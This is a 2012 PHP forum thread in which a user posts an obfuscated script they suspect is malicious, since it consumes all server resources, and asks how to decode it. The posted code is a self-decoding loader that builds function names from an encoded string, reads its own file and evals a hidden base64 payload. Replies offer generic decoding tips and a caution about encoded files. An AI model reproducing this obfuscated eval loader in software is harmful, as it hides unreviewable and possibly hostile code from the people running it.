how to decode base64 php code

Discussion in 'PHP' started by brookshunt, Mar 10, 2012.

0
  1. #1
    I downloaded a script and now it's using 100% of my server's resources. I believe the script has malicious code but I am unable to decode it to see. Can someone please explain to me how to view the source code?

    The first part of the script is:
    <?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x39c;
    Code (markup):
    Part 2:
    eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDg5KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdONDFqOFRDYkxER0U5d1owMldpK01uczdWa3hyeVBJSllYUXV0bWRBUlMvMzVxaFVIcGc2ZnpGQmNPbHZlYW9LPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>
    Code (markup):
    Part 3:
    flkje~EnhJbS~rkD8a09j409j409jz6PbDJydnHrCTukiYA7zaCiMpT7zeAE1LALQct+fa098eH+6NHEQLALQHt+fa09jNH98eHG1W0+feH9jNH98eRD8eH+6NH+feH91Yt+6NH98eH+6NHE1W0+6NH+6NH9jNSE1PZwjT/ZTWjVtp8WfMOPzRH9mPSGfzhy6PsxBXgIn4DimmVM7nfrsW4Mm9U96npxTnLyCyFkASC2dw0rbkmVsaE0iy5DfT12fWTWtPLiMSE+8zZ+z4WMmwMnnk7sTmxVsDukCndkFXSxdq5rsOUybTgyBWzPAPcI7RH9+L6wjMFw6YOGgeAGitSZFkurCa6kiYt+6NH98eH+6NHG+qmPdT5G1W0+6NH+6NH+6NSZH==1dmhVFpzkCMRLdmhVgaXyb45xswXPCmUrmafrBNhyCXHLQtv1QWhV7kmkFTfxsahLjfYDgyv1QW6rsTgPbtq0dT6yFmArQYAPFnQyFmfknafx7W5kiy5DbPmVAwSPCnJPCmfrCMSZHRtyFzXyAWOE+OXyBwSkFcRDBPmVAwSPCnJxFnOPFagk1y5DbPmVAwSPCnJxFnOPFagk1tv1QW6rsTgPbtq0dT6yFmArQYAPFnQyFmfknatk7wuydmHPCmUrQy5DbPmVAwSPCnJkCn6VBDSybWSrFcSZHRtyFzXyAWOE+OXyBwSkFcRDBWSPCpm7FXmVsWmyu8AE1Wfx7W5knaRksTtk7LpG+5GDbwqV7DfIifoV7w6xsPhG1Pfx7W5knaRksTtk7LgDgHtPCmfrCnJxCnXkCng9Qtv1QW6rsTgPbtq0dT6yFmArQYArdTFksPXPCmUrQy5DCOXPdnAV7WSrFcSZHRtyFzXyAWOE+OXyBwSkFcRDFWXPCMAECWXPCMRLtVYk1HYsiLSG+5GDbwqV7DfIifoV7w6xsPhG1PhV7kmkFTfxsahDgHtrdTFksPXPCmUrQtv1QW6rsTgPbtq0dT6yFmArQYAkCaqVsmh7Bngr1y5DCWUrsTSrmazydHSZHRtyFzXyAWOE+OXyBwSkFcRDFWUrsTSrQy5DCWUrsTSrQtv1QW6rsTgPbtq0dT6yFmArQYAxCaqknaHVsPmDgHtxCaqknaHVsPmG+5GDbwqV7DfIifoV7w6xsPhG1PtV7Wm7BmmV7LAECWXPCMRLmtQGitv1QW6rsTgPbtq0dT6yFmArQYAyFXUybSSrCpX7BWgVsw3xsOADgHtyFXUybSSrCpX7BWgVsw3xsOAG+5GDbwqV7DfIifokCm6yCpXIiYAxsOtk7YhPb45Dgtv1Y==srg^bL]qNZ|xKoYHhm
    Code (markup):

     
    brookshunt, Mar 10, 2012 IP
  2. Bank Developer

    Bank Developer Peon

    Messages:
    8
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    base64_decode() or any of the tools available online.
     
    Bank Developer, Mar 11, 2012 IP
  3. MrPJH

    MrPJH Well-Known Member

    Messages:
    1,066
    Likes Received:
    7
    Best Answers:
    1
    Trophy Points:
    155
    #3
    above stated code is not base64 encoded
    however use base64decode.org to decode Edit and re encode
     
    MrPJH, Mar 12, 2012 IP
  4. sonu21

    sonu21 Member

    Messages:
    102
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    26
    #4
    sonu21, Mar 20, 2012 IP
  5. harry.singh

    harry.singh Active Member

    Messages:
    38
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    98
    #5
    Can you PM the source file ????
     
    harry.singh, Mar 26, 2012 IP
  6. sarahk

    sarahk iTamer Staff

    Messages:
    28,899
    Likes Received:
    4,555
    Best Answers:
    123
    Trophy Points:
    665
    #6
    What is the name of the script?

    It's always a risk when you upload encoded files. I get that the programmers need to protect their intellectual property but there are other ways of doing it. After all vB is unencoded and people still happily spend hundreds for their code.
     
    sarahk, Mar 26, 2012 IP